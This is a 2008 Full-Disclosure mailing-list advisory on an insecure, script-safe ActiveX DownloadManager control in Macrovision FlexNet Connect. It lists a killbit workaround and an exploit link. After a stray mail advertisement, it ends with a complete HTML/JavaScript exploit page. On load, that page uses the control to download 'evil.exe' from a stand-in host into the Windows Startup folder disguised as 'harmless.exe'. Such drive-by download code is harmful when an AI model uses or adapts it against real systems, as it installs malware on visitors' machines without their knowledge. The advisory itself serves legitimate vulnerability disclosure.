flexnet-overwrite.txt
Posted on 15 January 2008
Who: Macrovision What: Macrovision FlexNext Connect is a software package that allows ISV's to update their software products. It is generally used in conjunction with the InstallShield software deploymnet framework. FlexNet uses a number of ActiveX controls, some of which are marked safe for scripting, in this case, the DownloadManager object: ISDM.exe version 6.1.100.61372 MVSNClientDownloadManager61Lib.DownloadManager {FCED4482-7CCB-4E6F-86C9-DCB22B52843C} IObjectSafety: IO. Safe for scripting (IDispatch) How: This control contains several methods which can be used to silently download arbitrary files to the system and possibly overwrite files in the context of the user. Workaround: Set the killbit for this control and the Basket control(see Notes), see http://support.microsoft.com/kb/240797 Fix: None Exploit; http://milw0rm.com/exploits/4909 Notes: The Basket object {1DF951B1-8D40-4894-A04C-66AD824A0EEF} of isusweb.dll can be used in a similar manner to download and execute files on a system via the ISDM scheduling framework, however, it does so visibly. I understand that some of this functionality is by design, however, there should be some validation in place to verify that the files that are being downloaded are indeed from a trusted source and are -- Click here and choose from thousands of high quality used cars. http://tagline.hushmail.com/fc/Ioyw6h4fKQ1cTGSIM7gFWipCcboNGVFhKad0XVtWL17fgTXnXnvcla/ updates to packages that are actually installed on the system. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ <!-- Macrovision FlexNet DownloadManager Insecure Methods Exploit Implemented Categories: Category: Safe for Scripting Written by e.b. Tested on Windows XP SP2(fully patched) English, IE6, ISDM.exe version 6.1.100.61372 --> <html> <head> <title>Macrovision FlexNet DownloadManager Insecure Methods Exploit</title> <script language="JavaScript" defer> function Check() { var mJob = obj.CreateJob("SomeJob",0,"{11111111-1111-1111-1111-111111111111}"); mJob.AddFile("http://www.evilsite/evil.exe","C:\Documents and Settings\All Users\Start Menu\Programs\Startup\harmless.exe"); mJob.SetPriority(0); mJob.SetNotifyFlags(2); mJob.ScheduleInterval = 2; obj.RunScheduledJobs(); } </script> </head> <body onload="JavaScript: return Check();"> <object id="obj" classid="clsid:FCED4482-7CCB-4E6F-86C9-DCB22B52843C" height="0" width="0"> Unable to create object </object> </body> </html>
